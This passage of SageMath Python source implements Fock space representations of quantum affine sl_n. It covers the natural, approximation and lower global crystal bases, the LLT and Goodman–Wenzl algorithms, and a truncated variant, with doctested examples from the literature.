+ (q^2+1)*|[2, 1], [1]> + 2*q*|[2], [2]> + 2*q^2*|[2], [1, 1]>
+ q^2*|[1, 1, 1, 1], []> + 2*q^2*|[1, 1], [2]>
+ 2*q^3*|[1, 1], [1, 1]> + (q^4+q^2)*|[1], [2, 1]>
+ q^2*|[], [4]> + q^3*|[], [3, 1]> + q^3*|[], [2, 1, 1]>
+ q^4*|[], [1, 1, 1, 1]>
"""
def __init__(self, F):
r"""
Initialize ``self``.
EXAMPLES::
sage: A = FockSpace(2).A()
sage: TestSuite(A).run()
"""
self._basis_name = "approximation"
indices = PartitionTuples(level=len(F._multicharge),
regular=F._n)
CombinatorialFreeModule.__init__(self, F.base_ring(), indices,
prefix='A', bracket=False,
sorting_reverse=True,
category=FockSpaceBases(F))
self.module_morphism(self._A_to_fock_basis,
triangular='upper', unitriangular=True,
codomain=F.natural()).register_as_coercion()
options = FockSpaceOptions
@cached_method
def _A_to_fock_basis(self, la):
r"""
Return the `A` basis indexed by ``la`` in the natural basis.
EXAMPLES::
sage: A = FockSpace(3).A()
sage: A._A_to_fock_basis(Partition([3]))
|3> + q*|2, 1>
sage: A._A_to_fock_basis(Partition([2,1]))
|2, 1> + q*|1, 1, 1>
sage: FS = FockSpace(2, [0,1])
sage: F = FS.natural()
sage: A = FS.A()
sage: F(A[[],[1]])
|[], [1]>
"""
R = self.realization_of()
fock = R.natural()
if la.size() == 0:
return fock.highest_weight_vector()
if len(R._multicharge) > 1:
# Find one more than the first non-empty partition
k = 1
for p in la:
if p.size() != 0:
break
k += 1
# Reduce down to the lower level Fock space and do the computation
# and then lift back up to us by prepending empty partitions
if k == len(R._multicharge): # This means we get the empty partition
cur = fock.highest_weight_vector()
else:
F = FockSpace(R._n, R._multicharge[k:], R._q, R.base_ring())
Gp = F.G()
if k + 1 == len(R._multicharge):
cur = Gp._G_to_fock_basis(Gp._indices(la[k]))
cur = fock.sum_of_terms((fock._indices([[]]*k + [p]), c)
for p,c in cur)
else:
cur = Gp._G_to_fock_basis(Gp._indices(la[k:]))
cur = fock.sum_of_terms((fock._indices([[]]*k + list(pt)), c)
for pt,c in cur)
la = la[k-1]
r = R._multicharge[k-1]
else:
cur = fock.highest_weight_vector()
r = R._multicharge[0]
# Get the ladders and apply it to the current element
corners = la.corners()
cells = set(la.cells())
q = R._q
k = R._n - 1 # This is sl_{k+1}
b = ZZ.zero()
# While there is some cell left to count
while any(c[1]*k + c[0] >= b for c in corners):
power = 0
i = -b + r # This will be converted to a mod n number
for x in range(b // k + 1):
if (b-x*k, x) in cells:
power += 1
cur = cur.f(i)
cur /= q_factorial(power, q)
b += 1
return cur
approximation = A
class G(CombinatorialFreeModule, BindableClass):
r"""
The lower global crystal basis living inside of Fock space.
EXAMPLES:
We construct some of the tables/entries given in Section 10
of [LLT1996]_. For `\widehat{\mathfrak{sl}}_2`::
sage: FS = FockSpace(2)
sage: F = FS.natural()
sage: G = FS.G()
sage: F(G[2])
|2> + q*|1, 1>
sage: F(G[3])
|3> + q*|1, 1, 1>
sage: F(G[2,1])
|2, 1>
sage: F(G[4])
|4> + q*|3, 1> + q*|2, 1, 1> + q^2*|1, 1, 1, 1>
sage: F(G[3,1])
|3, 1> + q*|2, 2> + q^2*|2, 1, 1>
sage: F(G[5])
|5> + q*|3, 1, 1> + q^2*|1, 1, 1, 1, 1>
sage: F(G[4,2])
|4, 2> + q*|4, 1, 1> + q*|3, 3> + q^2*|3, 1, 1, 1>
+ q^2*|2, 2, 2> + q^3*|2, 2, 1, 1>
sage: F(G[4,2,1])
|4, 2, 1> + q*|3, 3, 1> + q^2*|3, 2, 2> + q^3*|3, 2, 1, 1>
sage: F(G[6,2])
|6, 2> + q*|6, 1, 1> + q*|5, 3> + q^2*|5, 1, 1, 1> + q*|4, 3, 1>
+ q^2*|4, 2, 2> + (q^3+q)*|4, 2, 1, 1> + q^2*|4, 1, 1, 1, 1>
+ q^2*|3, 3, 1, 1> + q^3*|3, 2, 2, 1> + q^3*|3, 1, 1, 1, 1, 1>
+ q^3*|2, 2, 2, 1, 1> + q^4*|2, 2, 1, 1, 1, 1>
sage: F(G[5,3,1])
|5, 3, 1> + q*|5, 2, 2> + q^2*|5, 2, 1, 1> + q*|4, 4, 1>
+ q^2*|4, 2, 1, 1, 1> + q^2*|3, 3, 3> + q^3*|3, 3, 1, 1, 1>
+ q^3*|3, 2, 2, 2> + q^4*|3, 2, 2, 1, 1>
sage: F(G[4,3,2,1])
|4, 3, 2, 1>
sage: F(G[7,2,1])
|7, 2, 1> + q*|5, 2, 1, 1, 1> + q^2*|3, 2, 1, 1, 1, 1, 1>
sage: F(G[10,1])
|10, 1> + q*|8, 1, 1, 1> + q^2*|6, 1, 1, 1, 1, 1>
+ q^3*|4, 1, 1, 1, 1, 1, 1, 1>
+ q^4*|2, 1, 1, 1, 1, 1, 1, 1, 1, 1>
sage: F(G[6,3,2])
|6, 3, 2> + q*|6, 3, 1, 1> + q^2*|6, 2, 2, 1> + q^3*|5, 3, 2, 1>
+ q*|4, 3, 2, 1, 1> + q^2*|4, 3, 1, 1, 1, 1>
+ q^3*|4, 2, 2, 1, 1, 1> + q^4*|3, 3, 2, 1, 1, 1>
sage: F(G[5,3,2,1])
|5, 3, 2, 1> + q*|4, 4, 2, 1> + q^2*|4, 3, 3, 1>
+ q^3*|4, 3, 2, 2> + q^4*|4, 3, 2, 1, 1>
For `\widehat{\mathfrak{sl}}_3`::
sage: FS = FockSpace(3)
sage: F = FS.natural()
sage: G = FS.G()
sage: F(G[2])
|2>
sage: F(G[1,1])
|1, 1>
sage: F(G[3])
|3> + q*|2, 1>
sage: F(G[2,1])
|2, 1> + q*|1, 1, 1>
sage: F(G[4])
|4> + q*|2, 2>
sage: F(G[3,1])
|3, 1>
sage: F(G[2,2])
|2, 2> + q*|1, 1, 1, 1>
sage: F(G[2,1,1])
|2, 1, 1>
sage: F(G[5])
|5> + q*|2, 2, 1>
sage: F(G[2,2,1])
|2, 2, 1> + q*|2, 1, 1, 1>
sage: F(G[4,1,1])
|4, 1, 1> + q*|3, 2, 1> + q^2*|3, 1, 1, 1>
sage: F(G[5,2])
|5, 2> + q*|4, 3> + q^2*|4, 2, 1>
sage: F(G[8])
|8> + q*|5, 2, 1> + q*|3, 3, 1, 1> + q^2*|2, 2, 2, 2>
sage: F(G[7,2])
|7, 2> + q*|4, 2, 2, 1>
sage: F(G[6,2,2])
|6, 2, 2> + q*|6, 1, 1, 1, 1> + q*|4, 4, 2> + q^2*|3, 3, 2, 1, 1>
For `\widehat{\mathfrak{sl}}_4`::
sage: FS = FockSpace(4)
sage: F = FS.natural()
sage: G = FS.G()
sage: F(G[4])
|4> + q*|3, 1>
sage: F(G[3,1])
|3, 1> + q*|2, 1, 1>
sage: F(G[2,2])
|2, 2>
sage: F(G[2,1,1])
|2, 1, 1> + q*|1, 1, 1, 1>
sage: F(G[3,2])
|3, 2> + q*|2, 2, 1>
sage: F(G[2,2,2])
|2, 2, 2> + q*|1, 1, 1, 1, 1, 1>
sage: F(G[6,1])
|6, 1> + q*|4, 3>
sage: F(G[3,2,2,1])
|3, 2, 2, 1> + q*|3, 1, 1, 1, 1, 1> + q*|2, 2, 2, 2>
+ q^2*|2, 1, 1, 1, 1, 1, 1>
sage: F(G[7,2])
|7, 2> + q*|6, 2, 1> + q*|5, 4> + q^2*|5, 3, 1>
sage: F(G[5,2,2,1])
|5, 2, 2, 1> + q*|5, 1, 1, 1, 1, 1> + q*|4, 2, 2, 1, 1>
+ q^2*|4, 2, 1, 1, 1, 1>
We construct the examples in Section 5.1 of [Fayers2010]_::
sage: FS = FockSpace(2, [0, 0])
sage: F = FS.natural()
sage: G = FS.G()
sage: F(G[[2,1],[1]])
|[2, 1], [1]> + q*|[2], [2]> + q^2*|[2], [1, 1]>
+ q^2*|[1, 1], [2]> + q^3*|[1, 1], [1, 1]> + q^4*|[1], [2, 1]>
sage: F(G[[4],[]])
|[4], []> + q*|[3, 1], []> + q*|[2, 1, 1], []> + q^2*|[2, 1], [1]>
+ q*|[2], [2]> + q^2*|[2], [1, 1]> + q^2*|[1, 1, 1, 1], []>
+ q^2*|[1, 1], [2]> + q^3*|[1, 1], [1, 1]> + q^2*|[1], [2, 1]>
+ q^2*|[], [4]> + q^3*|[], [3, 1]> + q^3*|[], [2, 1, 1]>
+ q^4*|[], [1, 1, 1, 1]>
"""
def __init__(self, F):
r"""
Initialize ``self``.
EXAMPLES::
sage: G = FockSpace(2).G()
sage: TestSuite(G).run()
"""
self._basis_name = "lower global crystal"
indices = PartitionTuples(level=len(F._multicharge),
regular=F._n)
CombinatorialFreeModule.__init__(self, F.base_ring(), indices,
prefix='G', bracket=False,
sorting_reverse=True,
category=FockSpaceBases(F))
self.module_morphism(self._G_to_fock_basis,
triangular='upper', unitriangular=True,
codomain=F.natural()).register_as_coercion()
options = FockSpaceOptions
@cached_method
def _G_to_fock_basis(self, la):
r"""
Return the `G` basis indexed by ``la`` in the natural basis.
EXAMPLES::
sage: G = FockSpace(3).G()
sage: G._G_to_fock_basis(Partition([3]))
|3> + q*|2, 1>
sage: G._G_to_fock_basis(Partition([2,1]))
|2, 1> + q*|1, 1, 1>
"""
# Special case for the empty partition
if la.size() == 0:
return self.realization_of().natural().highest_weight_vector()
# Special case for empty leading partitions
R = self.realization_of()
if len(R._multicharge) > 1 and la[0].size() == 0:
fock = R.natural()
# Find the first non-empty partition
k = 0
for p in la:
if p.size() != 0:
break
k += 1
# Reduce down to the lower level Fock space and do the computation
# and then lift back up by prepending empty partitions
# Note that this will never be for the empty partition, which
# is already taken care of
F = FockSpace(R._n, R._multicharge[k:], R._q, R.base_ring())
Gp = F.G()
if k + 1 == len(R._multicharge):
cur = Gp._G_to_fock_basis(Gp._indices(la[k]))
return fock.sum_of_terms((fock._indices([[]]*k + [p]), c) for p,c in cur)
cur = Gp._G_to_fock_basis(Gp._indices(la[k:]))
return fock.sum_of_terms((fock._indices([[]]*k + list(pt)), c) for pt,c in cur)
cur = R.A()._A_to_fock_basis(la)
s = cur.support()
s.sort() # Sort lex, which respects dominance order
s.pop() # Remove the largest
q = R._q
while s:
mu = s.pop()
d = cur[mu].denominator()
k = d.degree()
n = cur[mu].numerator()
if k != 0 or n.constant_coefficient() != 0:
gamma = sum(n[i] * (q**(i-k) + q**(k-i))
for i in range(min(n.degree(), k)))
gamma += n[k]
cur -= gamma * self._G_to_fock_basis(mu)
# Add any new support elements
for x in cur.support():
if x == mu or not mu.dominates(x): # Add only things (strictly) dominated by mu
continue
for i in reversed(range(len(s))):
if not s[i].dominates(x):
s.insert(i+1, x)
break
return cur
lower_global_crystal = G
canonical = G
###############################################################################
## Bases Category
class FockSpaceBases(Category_realization_of_parent):
r"""
The category of bases of a (truncated) Fock space.
"""
def __init__(self, base):
r"""
Initialize the bases of a Fock space.
INPUT:
- ``base`` -- a Fock space
TESTS::
sage: from sage.algebras.quantum_groups.fock_space import FockSpaceBases
sage: F = FockSpace(2)
sage: bases = FockSpaceBases(F)
sage: TestSuite(bases).run()
"""
Category_realization_of_parent.__init__(self, base)
def _repr_(self):
r"""
Return the representation of ``self``.
EXAMPLES::
sage: from sage.algebras.quantum_groups.fock_space import FockSpaceBases
sage: F = FockSpace(2)
sage: FockSpaceBases(F)
Category of bases of Fock space of rank 2 of multicharge (0,) over
Fraction Field of Univariate Polynomial Ring in q over Integer Ring
"""
return "Category of bases of {}".format(self.base())
def super_categories(self):
r"""
The super categories of ``self``.
EXAMPLES::
sage: from sage.algebras.quantum_groups.fock_space import FockSpaceBases
sage: F = FockSpace(2)
sage: bases = FockSpaceBases(F)
sage: bases.super_categories()
[Category of vector spaces with basis over Fraction Field
of Univariate Polynomial Ring in q over Integer Ring,
Category of realizations of Fock space of rank 2 of multicharge (0,)
over Fraction Field of Univariate Polynomial Ring in q over Integer Ring]
"""
return [ModulesWithBasis(self.base().base_ring()), Realizations(self.base())]
class ParentMethods:
def _repr_(self):
r"""
Text representation of this basis of Fock space.
EXAMPLES::
sage: FS = FockSpace(2)
sage: FS.A()
Fock space of rank 2 of multicharge (0,) over Fraction Field of
Univariate Polynomial Ring in q over Integer Ring
in the approximation basis
sage: FS.G()
Fock space of rank 2 of multicharge (0,) over Fraction Field of
Univariate Polynomial Ring in q over Integer Ring
in the lower global crystal basis
"""
return "{} in the {} basis".format(self.realization_of(), self._basis_name)
def some_elements(self):
r"""
Return some elements of ``self``.
EXAMPLES::
sage: F = FockSpace(3).natural()
sage: F.some_elements()[::13]
[3*|2> + 2*|1> + 2*|>,
|5>,
|3, 1, 1, 1>,
|3, 2, 2>,
|5, 1, 1, 1>,
|2, 2, 1, 1, 1, 1>,
|5, 2, 1, 1>,
|3, 2, 1, 1, 1, 1>]
sage: F = FockSpace(3, [0,1]).natural()
sage: F.some_elements()[::13]
[2*|[1], []> + 4*|[], [1]> + |[], []>,
|[1, 1], [1]>,
|[1, 1, 1], [1]>,
|[5], []>,
|[3], [1, 1]>,
|[1], [2, 2]>,
|[4, 1, 1], []>,
|[2, 1, 1, 1], [1]>]
"""
others = [self.monomial(la) for la in self.basis().keys().some_elements()]
return [self.an_element()] + others
def q(self):
r"""
Return the parameter `q` of ``self``.
EXAMPLES::
sage: FS = FockSpace(2)
sage: A = FS.A()
sage: A.q()
q
sage: FS = FockSpace(2, q=-1)
sage: G = FS.G()
sage: G.q()
-1
"""
return self.realization_of()._q
def multicharge(self):
r"""
Return the multicharge of ``self``.
EXAMPLES::
sage: FS = FockSpace(4)
sage: A = FS.A()
sage: A.multicharge()
(0,)
sage: FS = FockSpace(4, [1,0,2])
sage: G = FS.G()
sage: G.multicharge()
(1, 0, 2)
"""
return self.realization_of()._multicharge
@cached_method
def highest_weight_vector(self):
r"""
Return the highest weight vector of ``self``.
EXAMPLES::
sage: FS = FockSpace(2)
sage: F = FS.natural()
sage: F.highest_weight_vector()
|>
sage: A = FS.A()
sage: A.highest_weight_vector()
A[]
sage: G = FS.G()
sage: G.highest_weight_vector()
G[]
"""
level = len(self.realization_of()._multicharge)
if level == 1:
return self.monomial(self._indices([]))
return self.monomial(self._indices([[]]*level))
def __getitem__(self, i):
r"""
Return the basis element indexed by ``i``.
INPUT:
- ``i`` -- a partition
EXAMPLES::
sage: F = FockSpace(3)
sage: A = F.A()
sage: A[[]]
A[]
sage: A[4]
A[4]
sage: A[2,2,1]
A[2, 2, 1]
sage: G = F.G()
sage: G[[]]
G[]
sage: G[4]
G[4]
sage: G[2,2,1]
G[2, 2, 1]
For higher levels::
sage: F = FockSpace(2, [0, 0])
sage: G = F.G()
sage: G[[2,1],[1]]
G([2, 1], [1])
TESTS::
sage: F = FockSpace(3)
sage: A = F.A()
sage: A[2,2,2,1]
Traceback (most recent call last):
...
ValueError: [2, 2, 2, 1] is not an element of 3-Regular Partitions
sage: F = FockSpace(3, [0, 0])
sage: A = F.A()
sage: A[[], [2,2,2,1]]
Traceback (most recent call last):
...
ValueError: [[], [2, 2, 2, 1]] is not a 3-Regular partition tuples of level 2
"""
if i in ZZ:
i = [i]
i = self._indices(i)
if i.size() == 0:
return self.highest_weight_vector()
return self.monomial(i)
###############################################################################
## Truncated Fock space
class FockSpaceTruncated(FockSpace):
r"""
This is the Fock space given by partitions of length no more than `k`.
This can be formed as the quotient `\mathcal{F} / \mathcal{F}_k`,
where `\mathcal{F}_k` is the submodule spanned by all diagrams
of length (strictly) more than `k`.
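As a sketch of this projection (illustrative only; elements are modelled
as dictionaries mapping partitions, given as tuples of parts, to
coefficients), truncation simply discards the basis vectors indexed by
partitions with more than `k` parts::

    def truncate(vec, k):
        # Project a natural-basis element of F onto F / F_k by dropping
        # every partition with strictly more than k rows (sketch only).
        return {la: c for la, c in vec.items() if len(la) <= k}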
We have three bases:
- The natural basis indexed by truncated `n`-regular partitions:
:class:`~sage.algebras.quantum_groups.fock_space.FockSpaceTruncated.F`.
- The approximation basis that comes from LLT(-type) algorithms:
:class:`~sage.algebras.quantum_groups.fock_space.FockSpaceTruncated.A`.
- The lower global crystal basis:
:class:`~sage.algebras.quantum_groups.fock_space.FockSpaceTruncated.G`.
.. SEEALSO::
:class:`FockSpace`
EXAMPLES::
sage: F = FockSpace(2, truncated=2)
sage: mg = F.highest_weight_vector()
sage: mg.f(0)
|1>
sage: mg.f(0).f(1)
|2> + q*|1, 1>
sage: mg.f(0).f(1).f(0)
|3>
Compare this to the full Fock space::
sage: F = FockSpace(2)
sage: mg = F.highest_weight_vector()
sage: mg.f(0).f(1).f(0)
|3> + q*|1, 1, 1>
REFERENCES:
- [GW1999]_
"""
@staticmethod
def __classcall_private__(cls, n, k, q=None, base_ring=None):
r"""
Standardize input to ensure a unique representation.
EXAMPLES::
sage: R.<q> = ZZ[]
sage: F1 = FockSpace(3, truncated=2)
sage: F2 = FockSpace(3, q=q, truncated=2)
sage: F3 = FockSpace(3, q=q, base_ring=R, truncated=2)
sage: F1 is F2 and F2 is F3
True
sage: from sage.algebras.quantum_groups.fock_space import FockSpaceTruncated
sage: F4 = FockSpaceTruncated(3, 2, q, R)
sage: F1 is F4
True
"""
if q is None:
base_ring = PolynomialRing(ZZ, 'q')
q = base_ring.gen(0)
if base_ring is None:
base_ring = q.parent()
base_ring = FractionField(base_ring)
q = base_ring(q)
return super(FockSpace, cls).__classcall__(cls, n, k, q, base_ring)
def __init__(self, n, k, q, base_ring):
r"""
Initialize ``self``.
EXAMPLES::
sage: F = FockSpace(2, truncated=3)
sage: TestSuite(F).run()
"""
M = IntegerModRing(n)
self._k = k
FockSpace.__init__(self, n, (M(0),), q, base_ring)
def _repr_(self):
r"""
Return a string representation of ``self``.
EXAMPLES::
sage: FockSpace(2, truncated=3)
Fock space of rank 2 truncated at 3 over Fraction Field of
Univariate Polynomial Ring in q over Integer Ring
"""
return "Fock space of rank {} truncated at {} over {}".format(self._n, self._k, self.base_ring())
class F(CombinatorialFreeModule, BindableClass):
r"""
The natural basis of the truncated Fock space.
This is the natural basis of the full Fock space projected
onto the truncated Fock space. It inherits the
`U_q(\widehat{\mathfrak{sl}}_n)`-action from the action
on the full Fock space.
EXAMPLES::
sage: FS = FockSpace(4)
sage: F = FS.natural()
sage: FS3 = FockSpace(4, truncated=3)
sage: F3 = FS3.natural()
sage: u = F.highest_weight_vector()
sage: u3 = F3.highest_weight_vector()
sage: u3.f(0,3,2,1)
|2, 1, 1>
sage: u.f(0,3,2,1)
|2, 1, 1> + q*|1, 1, 1, 1>
sage: u.f(0,3,2,1,1)
((q^2+1)/q)*|2, 1, 1, 1>
sage: u3.f(0,3,2,1,1)
0
"""
def __init__(self, F):
r"""
Initialize ``self``.
EXAMPLES::
sage: F = FockSpace(2, truncated=3).natural()
sage: TestSuite(F).run() # long time
"""
self._basis_name = "natural"
# If the cell x is above the cell y
if len(F._multicharge) == 1: # For partitions
self._above = lambda x,y: x[0] < y[0]
else: # For partition tuples
self._above = lambda x,y: x[0] < y[0] or (x[0] == y[0] and x[1] < y[1])
self._addable = lambda la,i: [x for x in la.outside_corners()
if la.content(*x, multicharge=F._multicharge) == i]
self._removable = lambda la,i: [x for x in la.corners()
if la.content(*x, multicharge=F._multicharge) == i]
indices = Partitions(F._n, max_length=F._k)
CombinatorialFreeModule.__init__(self, F.base_ring(), indices,
prefix='', bracket=['|', '>'],
latex_bracket=['\\lvert', '\\rangle'],
sorting_reverse=True,
category=FockSpaceBases(F))
options = FockSpaceOptions
def _repr_term(self, m):
r"""
Return a representation of the monomial indexed by ``m``.
EXAMPLES::
sage: F = FockSpace(2, truncated=3).natural()
sage: F._repr_term(Partition([2,1,1]))
'|2, 1, 1>'
sage: F.highest_weight_vector()
|>
"""
return '|' + repr(m)[1:-1] + ">" # Strip the outer brackets of m
class Element(FockSpace.natural.Element):
r"""
An element in the truncated Fock space.
"""
def _f(self, i):
r"""
Apply the action of `f_i` on ``self``.
EXAMPLES::
sage: F = FockSpace(2, truncated=3).natural()
sage: mg = F.highest_weight_vector()
sage: mg.f(0)
|1>
sage: mg.f(0,1)
|2> + q*|1, 1>
sage: mg.f(0,1,0)
|3> + q*|1, 1, 1>
sage: mg.f(0,1,0,0)
0
sage: mg.f(0,1,0,1)
|4> + q*|3, 1> + q*|2, 1, 1>
sage: mg.f(0,1,0,1,0)
|5> + |3, 2> + 2*q*|3, 1, 1> + q^2*|2, 2, 1>
"""
P = self.parent()
def N_right(la, x, i):
return (sum(1 for y in P._addable(la, i) if P._above(y, x))
- sum(1 for y in P._removable(la, i) if P._above(y, x)))
q = P.realization_of()._q
k = P.realization_of()._k
return P.sum_of_terms([(la.add_cell(*x), c * q**N_right(la, x, i))
for la,c in self for x in P._addable(la, i)
if x[0] < k])
natural = F
class A(CombinatorialFreeModule, BindableClass):
r"""
The `A` basis of the Fock space, which is the approximation
basis of the lower global crystal basis.
INPUT:
- ``algorithm`` -- (default ``'GW'``) the algorithm to use when
computing this basis in the Fock space; the possible values are:
* ``'GW'`` -- use the algorithm given by Goodman and Wenzl
in [GW1999]_
* ``'LLT'`` -- use the LLT algorithm given in [LLT1996]_
.. NOTE::
The bases produced by the two algorithms are not the same
in general.
EXAMPLES::
sage: FS = FockSpace(5, truncated=4)
sage: F = FS.natural()
sage: A = FS.A()
We demonstrate that they are different bases, but both algorithms
still compute the basis `G`::
sage: A2 = FS.A('LLT')
sage: G = FS.G()
sage: F(A[12,9])
|12, 9> + q*|12, 4, 4, 1> + q*|8, 8, 5> + (q^2+1)*|8, 8, 4, 1>
sage: F(A2[12,9])
|12, 9> + q*|12, 4, 4, 1> + q*|8, 8, 5> + (q^2+2)*|8, 8, 4, 1>
sage: G._G_to_fock_basis(Partition([12,9]), 'GW')
|12, 9> + q*|12, 4, 4, 1> + q*|8, 8, 5> + q^2*|8, 8, 4, 1>
sage: G._G_to_fock_basis(Partition([12,9]), 'LLT')
|12, 9> + q*|12, 4, 4, 1> + q*|8, 8, 5> + q^2*|8, 8, 4, 1>
"""
def __init__(self, F, algorithm='GW'):
r"""
Initialize ``self``.
EXAMPLES::
sage: FS = FockSpace(2, truncated=3)
sage: A = FS.A()
sage: TestSuite(A).run()
sage: A2 = FS.A('LLT')
sage: TestSuite(A2).run()
"""
self._basis_name = "approximation"
if algorithm not in ['GW', 'LLT']:
raise ValueError("invalid algorithm")
self._alg = algorithm
indices = RegularPartitions_truncated(F._n, F._k)
CombinatorialFreeModule.__init__(self, F.base_ring(), indices,
prefix='A', bracket=False,
sorting_reverse=True,
category=FockSpaceBases(F))
self.module_morphism(self._A_to_fock_basis,
triangular='upper', unitriangular=True,
codomain=F.natural()).register_as_coercion()
options = FockSpaceOptions
@cached_method
def _LLT(self, la):
r"""
Return the result from the regular LLT algorithm on the partition
``la`` to compute the `A`-basis element in the corresponding
Fock space.
EXAMPLES::
sage: FS = FockSpace(5, truncated=4)
sage: F = FS.natural()
sage: A = FS.A()
sage: F(A[12,9])
|12, 9> + q*|12, 4, 4, 1> + q*|8, 8, 5> + (q^2+1)*|8, 8, 4, 1>
sage: A._LLT(Partition([12,9]))
|12, 9> + q*|12, 4, 4, 1> + q*|8, 8, 5> + (q^2+2)*|8, 8, 4, 1>
"""
R = self.realization_of()
fock = R.natural()
k = R._k
cur = fock.highest_weight_vector()
# Get the ladders and apply it to the current element
corners = la.corners()
cells = set(la.cells())
q = R._q
k = R._n - 1 # This is sl_{k+1}
r = R._multicharge[0]
b = ZZ.zero()
while any(c[1]*k + c[0] >= b for c in corners): # While there is some cell left to count
power = 0
i = -b + r # This will be converted to a mod n number
for x in range(b // k + 1):
if (b-x*k, x) in cells:
power += 1
cur = cur.f(i)
cur /= q_factorial(power, q)
b += 1
return cur
def _skew_tableau(self, cur, nu, d):
r"""
Return the action of the skew tableaux formed from ``nu`` by
applying the ``d`` fundamental weights.
EXAMPLES::
sage: FS = FockSpace(3, truncated=3)
sage: F = FS.natural()
sage: A = FS.A()
sage: G = FS.G()
sage: sk = A._skew_tableau(F(G[6,3]), Partition([6,3]), [1,1]); sk
|8, 4> + q*|8, 2, 2> + q*|7, 4, 1> + q^2*|7, 3, 2> + q*|6, 6>
+ q^2*|6, 5, 1> + q^2*|5, 4, 3> + q^3*|4, 4, 4>
sage: sk == F(A[8,4])
True
"""
R = self.realization_of()
last = None
power = 0
q = R._q
for i in reversed(range(len(d))):
for dummy in range(d[i]):
for j in range(i+1):
col = nu[j] if j < len(nu) else 0
res = nu.content(j, col, multicharge=R._multicharge)
if res != last:
cur /= q_factorial(power, q)
power = 1
last = res
else:
power += 1
cur = cur.f(res)
nu = nu.add_cell(j, col)
return cur / q_factorial(power, q)
@cached_method
def _A_to_fock_basis(self, la):
r"""
Return the `A` basis indexed by ``la`` in the natural basis.
EXAMPLES::
sage: FS = FockSpace(2, truncated=3)
sage: F = FS.natural()
sage: A = FS.A()
sage: A._A_to_fock_basis(Partition([2,1]))
|2, 1>
sage: F(A[3,1])
|3, 1> + q*|2, 2> + q^2*|2, 1, 1>
sage: A._A_to_fock_basis(Partition([3]))
|3> + q*|1, 1, 1>
sage: FS = FockSpace(2, truncated=5)
sage: F = FS.natural()
sage: A = FS.A()
sage: F(A[7,4,3])
|7, 4, 3> + q*|7, 4, 1, 1, 1> + q^2*|7, 2, 2, 2, 1> + |5, 4, 3, 2>
+ 2*q*|5, 4, 3, 1, 1> + 2*q^2*|5, 4, 2, 2, 1>
+ 2*q^3*|5, 3, 3, 2, 1> + q^4*|4, 4, 3, 2, 1>
sage: F(A[7,4,3,2])
|7, 4, 3, 2> + q*|7, 4, 3, 1, 1> + q^2*|7, 4, 2, 2, 1>
+ q^3*|7, 3, 3, 2, 1> + q^4*|6, 4, 3, 2, 1>
"""
if self._alg == 'LLT':
return self._LLT(la)
# Otherwise we use the GW algorithm
fock = self.realization_of().natural()
k = self.realization_of()._k
# We do some special cases first
# For the empty partition
if la.size() == 0:
return fock.highest_weight_vector()
# For length k partitions
if len(la) == k:
G = self.realization_of().G()
return G._G_to_fock_basis(la)
# For critical partitions
n = self.realization_of()._n
if len(la) == k-1 and all((la[i] - la[i+1] + 1) % n == 0 for i in range(k-2)) \
and (la[-1] + 1) % n == 0:
return fock.monomial(la)
# For interior partitions
shifted = [la[i] - (n - 1)*(k - 1 - i) for i in range(len(la))]
if len(la) == k - 1 and shifted in _Partitions:
# Construct the d's and the critical partition
d = [(la[i] - la[i+1] + 1) % n for i in range(len(la)-1)]
d.append((la[-1] + 1) % n)
crit = list(la)
for i,d_i in enumerate(d):
for j in range(i+1):
crit[j] -= d_i
nu = fock._indices(crit)
return self._skew_tableau(fock.monomial(nu), nu, d)
# For non-interior partitions
# Construct the d's and the partition ``a``
a = list(la) + [0]*(k - 1 - len(la)) # Add 0's to get the correct length
a = [a[i] + (k - 1 - i) for i in range(k-1)] # Shift the diagram
#shifted = list(a) # Make a copy of the shifted partition in case we need it later
d = [(a[i] - a[i+1]) % n for i in range(k-2)]
d.append(a[-1] % n)
for i,d_i in enumerate(d):
for j in range(i+1):
a[j] -= d_i
if sum(a) == 0: # a is contained in the fundamental box
return self._LLT(la)
p = list(a) # Make a copy that we can change
for i in range(k-2):
if a[i] - a[i+1] == 0:
d[i] -= 1
for j in range(i+1):
p[j] += 1
if a[-1] == 0:
d[-1] -= 1
for j in range(k-1):
p[j] += 1
p = [p[i] - (k - 1 - i) for i in range(k-1)]
I = self._indices
nu = I(p)
while not max(nu.to_exp()) < n:
# It is not regular, so we need to find the first regular
# partition after adding columns
while d[-1] == 0:
d.pop()
for j in range(d[-1]):
p[j] += 1
nu = I(p)
if la == nu:
j = -1
for i in range(k-2):
if p[i] - p[i+1] == 0:
j = -2
break
if p[i] > n and p[i] - p[i+1] > n:
j = i
if j != -2 and p[-1] > n:
j = k - 1
if j < 0:
return self._LLT(la)
G = self.realization_of().G()
nu = I([p[i] - n if i <= j else p[i] for i in range(k-1)])
d = [0]*j + [n]
return self._skew_tableau(G._G_to_fock_basis(nu), nu, d)
G = self.realization_of().G()
return self._skew_tableau(G._G_to_fock_basis(nu), nu, d)
approximation = A
class G(CombinatorialFreeModule, BindableClass):
r"""
The lower global crystal basis living inside of a
truncated Fock space.
EXAMPLES::
sage: FS = FockSpace(4, truncated=2)
sage: F = FS.natural()
sage: G = FS.G()
sage: F(G[3,1])
|3, 1>
sage: F(G[6,2])
|6, 2> + q*|5, 3>
sage: F(G[14])
|14> + q*|11, 3>
sage: FS = FockSpace(3, truncated=4)
sage: F = FS.natural()
sage: G = FS.G()
sage: F(G[4,1])
|4, 1> + q*|3, 2>
sage: F(G[4,2,2])
|4, 2, 2> + q*|3, 2, 2, 1>
We check against the tables in [LLT1996]_ (after truncating)::
sage: FS = FockSpace(3, truncated=3)
sage: F = FS.natural()
sage: G = FS.G()
sage: F(G[10])
|10> + q*|8, 2> + q*|7, 2, 1>
sage: F(G[6,4])
|6, 4> + q*|6, 2, 2> + q^2*|4, 4, 2>
sage: F(G[5,5])
|5, 5> + q*|4, 3, 3>
sage: FS = FockSpace(4, truncated=3)
sage: F = FS.natural()
sage: G = FS.G()
sage: F(G[3,3,1])
|3, 3, 1>
sage: F(G[3,2,2])
|3, 2, 2>
sage: F(G[7])
|7> + q*|3, 3, 1>
"""
def __init__(self, F):
r"""
Initialize ``self``.
EXAMPLES::
sage: G = FockSpace(2, truncated=3).G()
sage: TestSuite(G).run()
sage: G = FockSpace(4, truncated=3).G()
sage: TestSuite(G).run()
"""
self._basis_name = "lower global crystal"
indices = RegularPartitions_truncated(F._n, F._k)
CombinatorialFreeModule.__init__(self, F.base_ring(), indices,
prefix='G', bracket=False,
sorting_reverse=True,
category=FockSpaceBases(F))
self.module_morphism(self._G_to_fock_basis,
triangular='upper', unitriangular=True,
codomain=F.natural()).register_as_coercion()
options = FockSpaceOptions
@cached_method
